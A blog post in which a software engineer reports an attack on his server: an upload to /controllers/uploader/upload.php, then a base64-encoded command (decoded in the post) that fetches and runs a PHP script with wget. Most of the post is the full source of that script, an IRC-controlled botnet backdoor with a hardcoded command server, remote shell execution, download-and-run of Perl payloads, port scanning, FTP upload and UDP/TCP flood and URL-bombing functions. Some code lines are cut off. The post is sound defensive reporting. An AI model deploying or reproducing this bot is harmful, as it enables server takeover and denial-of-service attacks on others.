Attack that tries to install wp-infos.php via POST /controllers/uploader/upload.php

I saw another novel attack today. What makes this one particularly interesting is that the first request was an attempt to upload a file named /wp-infos.php. It did so via a

POST /controllers/uploader/upload.php

request. That path might be an alternate for the ninja uploader vulnerability I wrote about yesterday.

The attacker then issued a

GET /wp-infos.php?osc=cm0gLXJmIHp1Yi4qOyBybSAtcmYgbWFyaW5hYnkqOyB3Z2V0IGh0dHA6Ly93d3cuYWVzbWkucHQvbW9vZGxlL2NhbGVuZGFyL3dwLWVuZ2luZS5id2U7IG12IHdwLWVuZ2luZS5id2UgenViLnBocDsgY2htb2QgNzc3IHp1Yi5waHA7IHBocCB6dWIucGhwOyBybSAtcmYgenViLio=

The value for the osc parameter is base64 encoded and decodes to:

rm -rf zub.*; rm -rf marinaby*; wget http://www.aesmi.pt/moodle/calendar/wp-engine.bwe; mv wp-engine.bwe zub.php; chmod 777 zub.php; php zub.php; rm -rf zub.*

I fetched the URI hosted on www.aesmi.pt using curl and to my surprise it was the exact same PHP script the attacker believed they had just installed on my system. Literally byte for byte identical.

Below you’ll find the 855 line PHP script the attacker attempted to install. There are a couple of things worth pointing out. The server this script attempts to connect to is at IP address 78.140.173.43 which has hostname v-5-509-d4122-43.webazilla.com (although the backdoor implements a “moveserver” command to allow the person controlling this bot to change the server). The “chan” is the typical hacker value “1x33x7”.

<?php
  set_time_limit( 0 );
  error_reporting( 0 );
  echo "Success!";

  class pBot
  {
    var $using_encode = true;

    var $config = array(
      'server'   => 'NzguMTQwLjE3My40Mw==',  //server here (base64)
      'port'    => 9595,
      'chan'    => 'MXgzM3g3',    //channel here (base64) DO NOT USE "#", "#lazy" = "lazy"
      'key'    => '',
      'nickform'  => 'logging[%d]',
      'identp'  => 'darxs',
      'modes'    => '+p',
      'maxrand'  => 6,
      'cprefix'  => '!',
      'host'    => 'Peter@'
    );

    var $admins = array
    (
      'LND-Bloodman' => '2cbd62e679d89acf7f1bfc14be08b045' // pass = "lol_dont_try_cracking_12char+_:P"
      //passes are MD5 format, you can also have multiple admins
    );

    function auth_host( $nick, $password, $host )
    {
      $admin_count = count( $this->admins );
      if( $admin_count > 0 )
      {
        $mpass = md5( $password );
        if( $this->admins[ $nick ] == $mpass )
        {
          $this->users[ $host ] = true;
        }
      }
      else
      {
        $this->users[ $host ] = true;
      }
    }

    function is_authed( $host )
    {
      return isset( $this->users[ $host ] );
    }

    function remove_auth( $host )
    {
      unset( $this->users[ $host ] );
    }

    function ex( $cfe )
    {
      $res = '';
      if (!empty($cfe))
      {
        if(function_exists('class_exists') && class_exists('Perl'))
        {
          $perl = new Perl();
          $perl->eval( "system('$cfe');" );
        }
        if(function_exists('exec'))
        {
          @exec($cfe,$res);
          $res = join("\n",$res);
        }
        elseif(function_exists('shell_exec'))
        {
          $res = @shell_exec($cfe);
        }
        elseif(function_exists('system'))
        {
          @ob_start();
          @system($cfe);
          $res = @ob_get_contents();
          @ob_end_clean();
        }
        elseif(function_exists('passthru'))
        {
          @ob_start();
          @passthru($cfe);
          $res = @ob_get_contents();
          @ob_end_clean();
        }
        elseif(function_exists('proc_open'))
        {
          $res = proc_open($cfe);
        }
        elseif(@is_resource($f = @popen($cfe,"r")))
        {
          $res = "";
          while(!@feof($f)) { $res .= @fread($f,1024); }
          @pclose($f);
        }
      }
      return $res;
    }

    function is_safe( )
    {
      if( ( @eregi( "uid", $this->ex( "id" ) ) ) || ( @eregi( "Windows", $this->ex( "net start" ) ) ) )
      {
        return 0;
      }
      return 1;
    }

    function get_chan( )
    {
      if( $this->using_encode )
      {
        return '#'.base64_decode( $this->config[ 'chan' ] );
      }
      else
      {
        return '#'.$this->config[ 'chan' ];
      }
    }

    function start()
    {
      if( $this->using_encode )
      {
        if(!($this->conn = fsockopen(base64_decode($this->config['server']),$this->config['port'],$e,$s,30)))
        {
          $this->start();
        }
      }
      else
      {
        if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
        {
          $this->start();
        }
      }

      $ident = $this->config['prefix'];
      $alph = range("0","9");
      for( $i=0; $i < $this->config['maxrand']; $i++ )
      {
        $ident .= $alph[rand(0,9)];
      }

      if( strlen( $this->config[ 'pass' ] ) > 0 )
      {
        $this->send( "PASS ".$this->config[ 'pass' ] );
      }

      $this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
      $this->set_nick( );
      $this->main( );
    }

    function main()
    {
      while(!feof($this->conn))
      {
        $this->buf = trim(fgets($this->conn,512));
        $cmd = explode(" ",$this->buf);
        if(substr($this->buf,0,6)=="PING :")
        {
          $this->send("PONG :".substr($this->buf,6));
        }
        if(isset($cmd[1]) && $cmd[1] =="001")
        {
          $this->send("MODE ".$this->nick." ".$this->config['modes']);

          if( $this->using_encode )
          {
            $this->join($this->get_chan( ),base64_decode($this->config['key']));
          }
          else
          {
            $this->join($this->get_chan( ),$this->config['key']);
          }

          if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
          else { $safemode = "off"; }
          $uname = php_uname();
        }
        if(isset($cmd[1]) && $cmd[1]=="433")
        {
          $this->set_nick();
        }
        if($this->buf != $old_buf)
        {
          $mcmd = array();
          $msg = substr(strstr($this->buf," :"),2);
          $msgcmd = explode(" ",$msg);
          $nick = explode("!",$cmd[0]);
          $vhost = explode("@",$nick[1]);
          $vhost = $vhost[1];
          $nick = substr($nick[0],1);
          $host = $cmd[0];
          if($msgcmd[0]==$this->nick)
          {
            for($i=0;$i<count($msgcmd);$i++)
              $mcmd[$i] = $msgcmd[$i+1];
          }
          else
          {
            for($i=0;$i<count($msgcmd);$i++)
              $mcmd[$i] = $msgcmd[$i];
          }
          if(count($cmd)>2)
          {
            switch($cmd[1])
            {
              case "QUIT":
              {
                if( $this->is_authed( $host ) )
                {
                  $this->remove_auth( $host );
                }
              }
              break;
              case "PART":
              {
                if( $this->is_authed( $host ) )
                {
                  $this->remove_auth( $host );
                }
              }
              break;
              case "PRIVMSG":
                if( ( substr($mcmd[0],0,1) == $this->config[ 'cprefix' ] ) )
                {
                  if( $this->is_authed( $host ) == false )
                  {
                    switch( substr( $mcmd[ 0 ], 1 ) )
                    {
                      case "auth":
                      {
                        $this->auth_host( $nick, $mcmd[ 1 ], $host );
                        if( $this->is_authed( $host ) )
                        {
                          $this->privmsg( $this->get_chan( ), "[ auth ] Successful login from [ ".$nick." ]" );
                        }
                        else
                        {
                          $this->privmsg( $this->get_chan( ), "[ auth ] Failed attempt from [ ".$nick." ]" );
                        }
                        break;
                      }
                    }
                  }
                  else
                  {
                    switch(substr($mcmd[0],1))
                    {
                      case "exec":
                      {
                        if( !$this->is_safe( ) )
                        {
                          $command = substr( strstr( $msg, $mcmd[0] ), strlen( $mcmd[0] ) + 1 );
                          $returndata = $this->ex( $command );
                          if( !empty( $returndata ) )
                          {
                            $this->privmsg( $this->get_chan( ), '[ exec ] '.$returndata );
                          }
                        }
                        break;
                      }
                      case "info":
                      {
                        $safemode = "on";
                        if( !$this->is_safe( ) )
                        {
                          $safemode = "off";
                        }
                        $this->privmsg( $this->get_chan( ), '[ info ] '.php_uname( ).' ( SAFE: '.$safemode.' )' );
                        break;
                      }
                      case "safe":
                      {
                        $safemode = "on";
                        if( !$this->is_safe( ) )
                        {
                          $safemode = "off";
                        }
                        $this->privmsg( $this->get_chan( ), '[ safe ] '.$safemode );
                        break;
                      }
                      case "uname":
                      {
                        $this->privmsg( $this->get_chan( ), '[ uname ] '.php_uname( ) );
                        break;
                      }
                      case "perl":
                      {
                        if( $this->is_safe( ) )
                        {
                          $this->privmsg( $this->get_chan( ), '[ dropperl ] Safe mode is ON' );
                          break;
                        }

                        $perl_file = $mcmd[1];

                        if( !empty( $perl_file ) )
                        {
                          $parsed_url = $this->parse_url_s( $perl_file );

                          $new_remote = $parsed_url[ 'scheme' ].'://'.$parsed_url[ 'host' ].$parsed_url[ 'dir' ].'/';
                          $new_local   = $parsed_url[ 'file' ];
                          $file_type  = $parsed_url[ 'file_ext' ];

                          $this->ex('cd /tmp;wget '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*');
                          $this->ex('cd /tmp;curl -O '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*');
                          $this->ex('cd /tmp;lwp-download '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*');
                          $this->ex('cd /tmp;lynx -source '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*');
                          $this->ex('cd /dev/shm;wget '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*');
                          $this->ex('cd /dev/shm;curl -O '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*');
                          $this->ex('cd /dev/shm;lwp-download '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*')
                          $this->ex('cd /dev/shm;lynx -source '.$new_remote.$new_local.';perl '.$new_local.';rm -rf *'.$file_type.'*')
                          $this->ex('cd /tmp;rm -rf *'.$file_type.'**');
                          $this->ex('cd /dev/shm;rm -rf *'.$file_type.'**');

                          $this->privmsg( $this->get_chan( ), '[ execrfi ] Executed file '.$new_remote.$new_local );
                          break;
                        }

                        $this->privmsg( $this->get_chan( ), '[ execrfi ] Failure executing '.$perl_file );
                        break;
                      }
                      case "ip":
                      {
                        $this->privmsg( $this->get_chan( ), '[ ip ] '.$_SERVER['SERVER_ADDR'] );
                        break;
                      }
                      case "rfi":
                      {
                        $fileUrl = $mcmd[1];

                        if( !empty( $fileUrl ) )
                        {
                          $urli = parse_url( $fileUrl );

                          if( !empty( $urli['host'] ) && !empty( $urli['path'] ) && !empty( $urli['query'] ) )
                          {
                            $fp = fsockopen( $urli['host'], 80, $errno, $errstr, 5 );

                            if( $fp )
                            {
                              $out = "GET /".$urli['path'].$urli['query']." HTTP/1.1\r\n";
                              $out .= "Host: ".$urli['host']."\r\n";
                              $out .= "Keep-Alive: 300\r\n";
                              $out .= "Connection: keep-alive\r\n\r\n";
                              fwrite( $fp, $out );

                              $get_data = '';

                              while(!feof($fp))
                              { $get_data .= fgets( $fp, 256 ); }

                              $this->privmsg( $this->get_chan( ), '[ execrfi ] Executed file '.$fileUrl );
                              break;
                            }
                          }
                        }

                        $this->privmsg( $this->get_chan( ), '[ execrfi ] Failure executing '.$fileUrl );
                        break;
                      }
                      case "base64":
                      {
                        $str_ed = substr( strstr( $msg, $mcmd[1] ), strlen( $mcmd[1] ) + 1 );
                        switch( $mcmd[1] )
                        {
                          case "encode":
                          {
                            $this->privmsg( $this->get_chan( ), "[ base64 ] encode [ '".$str_ed."' -> '".base64_encode($str_ed).
                            break;
                          }
                          case "decode":
                          {
                            $this->privmsg( $this->get_chan( ), "[ base64 ] decode [ '".$str_ed."' -> '".base64_decode($str_ed).
                            break;
                          }
                        }
                        break;
                      }
                      case "md5":
                      {
                        $str_md5 = substr( strstr( $msg, $mcmd[0] ), strlen( $mcmd[0] ) + 1 );
                        $this->privmsg( $this->get_chan( ), "[ md5 ] [ '".$str_md5."' -> '".md5($str_md5)."' ]" );
                        break;
                      }
                      case "dns":
                      {
                        if(isset($mcmd[1]))
                                         {
                                            $ip = explode(".",$mcmd[1]);
                                            if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1])
                            && is_numeric($ip[2]) && is_numeric($ip[3]))
                                            {
                                               $this->privmsg($this->get_chan( ),"[ dns ]: ".$mcmd[1]." => ".gethostbyaddr($mcmd
                                            }
                                            else
                                            {
                                               $this->privmsg($this->get_chan( ),"[ dns ]: ".$mcmd[1]." => ".gethostbyname($mcmd
                                            }
                                         }
                        break;
                      }
                      case "exit":
                      {
                        fclose( $this->conn );
                        exit( );
                        break;
                      }
                      case "restart":
                      {
                        $this->privmsg( $this->get_chan( ), "[ restart ] executed by [".$nick."]" );
                        $this->send( "QUIT :restart command from ".$nick );
                        fclose( $this->conn );
                        $this->start();
                        break;
                      }
                      case "bs":
                      {
                        if( $this->is_safe( ) )
                        {
                          ini_restore( "safe_mode" );
                          ini_restore( "open_basedir" );
                        }

                        $safemode = "on";
                        if( !$this->is_safe( ) )
                        {
                          $safemode = "off";
                          $this->set_nick();
                        }
                        $this->privmsg( $this->get_chan( ), '[ safe ] '.$safemode );
                      }
                      case "moveserver":
                      {
                        if( count( $mcmd ) > 3 )
                        {
                          $server = $mcmd[1];
                          $port = $mcmd[2];
                          $channel = $mcmd[3];
                          $key = $mcmd[4];

                          if( $this->using_encode )
                          {
                            $this->config[ 'server' ] = base64_encode( $server );
                            $this->config[ 'chan' ] = base64_encode( str_replace( "#", "", $channel ) );
                            $this->config[ 'key' ] = base64_encode( $key );
                          }
                          else
                          {
                            $this->config[ 'server' ] = $server;
                            $this->config[ 'chan' ] = str_replace( "#", "", $channel );
                            $this->config[ 'key' ] = $key;
                          }

                          $this->config[ 'port' ] = $port;
                          $this->privmsg( $this->get_chan( ), "[ moveserver ] ".$server." => ".$port." => ".$channel." =>
                          $this->send( "QUIT :moveserver command from ".$nick );

                          fclose( $this->conn );
                          $this->start();
                        }
                        break;
                      }
                      case "whois":
                      {
                        $param2 = $mcmd[1];

                        if( !empty( $param2 ) )
                        {
                          //do it
                          //http://ws.arin.net/whois/?queryinput=127.0.0.1
                          $fp = fsockopen( "ws.arin.net", 80, $errno, $errstr, 30 );

                          if( $fp )
                          {
                            $out = "GET /whois/?queryinput=$param2 HTTP/1.1\r\n";
                            $out .= "Host: ws.arin.net\r\n";
                            $out .= "Keep-Alive: 300\r\n";
                            $out .= "Connection: keep-alive\r\n\r\n";
                            fwrite( $fp, $out );

                            $whodata = '';
                            while(!feof($fp))
                            {
                              /*do nothing*/
                              $whodata .= fread( $fp, 1024 );
                            }

                            $explk = explode( "<div id=\"content\">", $whodata );
                            $explk = explode( "</div>", $explk[1] );
                            $htmldat = strip_tags( $explk[0] );

                            fclose( $fp );

                            $this->privmsg( $this->get_chan( ), "[ whois ] $htmldat" );

                          }else{
                            $this->privmsg( $this->get_chan( ), "[ whois ] Error: $errstr" );
                          }
                        }
                        else
                        {
                          $this->privmsg( $this->get_chan( ), "[ whois ] Invalid params, use .whois <ip/host>" );
                        }
                        break;
                      }
                      case "upftp":
                      {
                        //ftp://user:password@host.com
                        $pftp = parse_url( $mcmd[1] );
                        $file = $mcmd[2];
                        $dest = $mcmd[3];

                        if( empty( $pftp[ 'host' ] )
                          || empty( $pftp[ 'user' ] )
                          || empty( $pftp[ 'pass' ] )
                          || empty( $file )
                          || empty( $dest ) )
                        {
                          $this->privmsg( $this->get_chan( ), "[ upftp ] URL line invalid!" );
                        }
                        else
                        {
                          $conn_id = ftp_connect( $pftp[ 'host' ] );
                          $login_result = ftp_login( $conn_id, $pftp[ 'user' ], $pftp[ 'pass' ] );

                          if( ( !$conn_id ) || ( !$login_result ) )
                          {
                            $this->privmsg( $this->get_chan( ), "[ upftp ] FTP connection failed!" );
                          }
                          else
                          {
                            $this->privmsg( $this->get_chan( ), "[ upftp ] Connected to ".$pftp[ 'host' ]." for user ".$pftp[ 'user
                            $upload = ftp_put( $conn_id, $dest, $file, FTP_BINARY );
                            if( !$upload )
                            {
                              $this->privmsg( $this->get_chan( ), "[ upftp ] FTP upload faled!" );
                            }
                            else
                            {
                              $this->privmsg( $this->get_chan( ), "[ upftp ] FTP upload success!" );
                              $this->privmsg( $this->get_chan( ), "[ upftp ] Uploaded '".$file."' to '".$dest."'" );
                            }
                          }
                        }
                        break;
                      }
                      case "joinchan":
                      {
                        $channel = $mcmd[1];
                        $key = $mcmd[2];
                        $this->privmsg( $this->get_chan( ), "[ joinchan ] ".$channel." => ".$key );
                        $this->join( $channel, $key );
                        break;
                      }
                      case "partchan":
                      {
                        $this->privmsg( $this->get_chan( ), "[ partchan ] ".$mcmd[1] );
                        $this->send( "PART ".$mcmd[1] );
                      }
                      case "vuln":
                      {
                        $server_name = $_SERVER['SERVER_NAME'];
                        $req_uri = $_SERVER['REQUEST_URI'];

                        if( $server_name != "localhost" && $server_name != "127.0.0.1" )
                        {
                          if( strlen( $server_name ) && strlen( $req_uri ) )
                          {
                            $vuln = "http://".$server_name.$req_uri;
                            $this->privmsg( $this->get_chan( ), "[ getvuln ] ".$vuln );
                          }
                        }
                        break;
                      }
                      case "download":
                      {
                        if( count( $mcmd ) > 2 )
                        {
                          if( !$fp = fopen( $mcmd[ 2 ], "w" ) )
                          {
                            $this->privmsg( $this->get_chan( ), "[ download ] Permission denied!" );
                          }
                          else
                          {
                            if( !$get = file( $mcmd[ 1 ] ) )
                            {
                              $this->privmsg( $this->get_chan( ), "[ download ] Download failed!" );
                            }
                            else
                            {
                              for( $i=0; $i <= count( $get ); $i++ )
                              {
                                fwrite( $fp, $get[ $i ] );
                              }
                              $this->privmsg( $this->get_chan( ),"[ download ] URL [".$mcmd[ 1 ]."] to [".$mcmd[ 2 ]."]");
                            }
                            fclose( $fp );
                          }
                        }
                        else
                        {
                          $this->privmsg( $this->get_chan( ), "[ download ] Invalid Parameters, idiot!" );
                        }
                        break;
                      }
                      case "pmsg":
                      {
                        $person = $mcmd[1];
                        $text = substr( strstr( $msg, $mcmd[1] ), strlen( $mcmd[1] ) + 1 );
                        $this->privmsg( $this->get_chan( ), "[ pmsg ] ".$person." => ".$text );
                        $this->privmsg( $person, $text );
                        break;
                      }
                      case "pscan":
                      {
                        $host = $mcmd[1];
                        $beginport = $mcmd[2];
                        $endport = $mcmd[3];
                        $open_ports = "Open Port List for ".$host.": ";

                        for($i = $beginport; $i < $endport; $i++)
                        {
                          if( $this->scanport( $host, $i ) )
                          {
                            $open_ports .= "|".$i;
                          }
                        }

                        $this->privmsg( $this->get_chan( ), $open_ports );
                        break;
                      }
                      case "software":
                      {
                        $this->privmsg( $this->get_chan( ), $_SERVER[ 'SERVER_SOFTWARE' ] );
                        break;
                      }
                      case "snf":
                      {
                        $this->config[ 'nickform' ] = $mcmd[ 1 ];
                        $this->privmsg( $this->get_chan( ), "Nickname format set to [ ".$mcmd[ 1 ]." ]" );
                        break;
                      }
                      case "randnick":
                      {
                        $this->set_nick();
                        break;
                      }
                      case "unauth":
                      {
                        $this->remove_auth( $host );
                        $this->privmsg( $this->get_chan( ), "[ auth ] Logout [ ".$nick." ]" );
                        break;
                      }
                      case "urlbomb":
                      {
                        $this->urlbomb( $mcmd[ 1 ], $mcmd[ 2 ], $mcmd[ 3 ] );
                        break;
                      }
                      case "udpflood":
                      {
                        if( count( $mcmd ) > 3 )
                        {
                          $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
                        }
                        break;
                      }
                      case "tcpflood":
                      {
                         if( count( $mcmd ) > 5 )
                         {
                           $this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
                         }
                         break;
                      }
                    }
                  }
                }
              break;
            }
          }
        }
        $old_buf = $this->buf;
      }
      $this->start();
    }

    function scanport( $host, $port )
    {
      if( fsockopen( $host, $port, $e, $s ) )
      {
        return 1;
      }
      return 0;
    }

    function urlbomb( $host, $path, $times, $mode = 0 )
    {
      if( !isset( $host ) || !isset( $path ) || !isset( $times ) )
        return;

      $this->privmsg( $this->get_chan( ), '[ urlbomb ] started! [ '.$host.'/'.$path.' ]' );

      $success = 0;
      for( $i = 0; $i < $times; $i++ )
      {
        $fp = fsockopen( $host, 80, $errno, $errstr, 30 );
        if( $fp )
        {
          $out = "GET /".$path." HTTP/1.1\r\n";
          $out .= "Host: ".$host."\r\n";
          $out .= "Keep-Alive: 300\r\n";
          $out .= "Connection: keep-alive\r\n\r\n";
          fwrite( $fp, $out );

          if( $mode != 0 )
          {
            while(!feof($fp)){/*do nothing*/}
          }

          fclose( $fp );

          $success++;
        }
      }

      $this->privmsg( $this->get_chan( ), '[ urlbomb ] finished! [ '.$host.'/'.$path.' ][ success: '.$success.' ]' );
    }

    function udpflood( $host, $packetsize, $time )
    {
      $this->privmsg( $this->get_chan( ),"[ udpflood ] Started [".$host."]" );
      $packet = "";
      for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
      $timei = time();
      $i = 0;
      while(time()-$timei < $time)
      {
        $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
        fwrite($fp,$packet);
        fclose($fp);
        $i++;
      }
      $env = $i * $packetsize;
      $env = $env / 1048576;
      $vel = $env / $time;
      $vel = round($vel);
      $env = round($env);
      $this->privmsg( $this->get_chan( ),"[ udpflood ] $env MB Sent / $vel MB/s ");
    }

    function tcpflood($host,$packets,$packetsize,$port,$delay)
    {
      $this->privmsg( $this->get_chan( ),"[\2TcpFlood Started!\2]");
      $packet = "";
      for($i=0;$i<$packetsize;$i++)
        $packet .= chr(mt_rand(1,256));

      for($i=0;$i<$packets;$i++)
      {
        if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
          {
          $this->privmsg( $this->get_chan( ),"[\2TcpFlood\2]: Error: <$e>");
            return 0;
           }
           else
           {
          fwrite($fp,$packet);
          fclose($fp);
        }
           sleep($delay);
      }
      $this->privmsg( $this->get_chan( ),"[\2TcpFlood Finished!\2]: Config - $packets for $host:$port.");
    }

    function send($msg)
    {
      fwrite($this->conn,"$msg\r\n");
    }

    function join($chan,$key=NULL)
    {
      $this->send("JOIN $chan $key");
    }

    function privmsg($to,$msg)
    {
      $this->send("PRIVMSG $to :$msg");
    }

    function notice($to,$msg)
    {
      $this->send("NOTICE $to :$msg");
    }

     function set_nick()
     {
      $prefix = "[lnx]";
      if(isset($_SERVER['SERVER_SOFTWARE']))
      {
        if( strstr( strtolower( $_SERVER[ 'SERVER_SOFTWARE' ] ), "apache" ) )
          $prefix = "[A]";
        elseif( strstr( strtolower( $_SERVER[ 'SERVER_SOFTWARE' ] ), "iis" ) )
          $prefix = "[I]";
        elseif( strstr( strtolower( $_SERVER[ 'SERVER_SOFTWARE' ] ), "xitami" ) )
          $prefix = "[X]";
        else
          $prefix = "[U]";
      }

      if( !$this->is_safe( ) )
      {
        $prefix .= "[win32]";
      }

      $random_number = "";
      for( $i = 0; $i < $this->config[ 'maxrand' ]; $i++ )
      {
        $random_number .= mt_rand( 0, 9 );
      }

      $this->nick = sprintf( $prefix.$this->config[ 'nickform' ], $random_number );
      $this->send("NICK ".$this->nick);
     }

    function parse_url_s( $url )
    {
      $URLpcs = ( parse_url( $url ) );
      $PathPcs = explode( "/", $URLpcs['path'] );
      $URLpcs['file'] = end( $PathPcs );
      unset( $PathPcs[ key( $PathPcs ) ] );
      $URLpcs['dir'] = implode("/",$PathPcs);

      $fileext = explode( '.', $URLpcs['file'] );

      if(count($fileext))
      {
        $URLpcs['file_ext'] = $fileext[ count( $fileext ) - 1 ];
      }

      return ($URLpcs);
    }
  }

  $bot = new pBot;
  $bot->start();

?>

Published by

Kurtis Rader

I'm first and foremost a Secular Humanist and Atheist. To pay the bills I'm a software engineer. When not working I walk or play with my dogs, read lots of non-fiction (and some fiction), and watch lots of movies.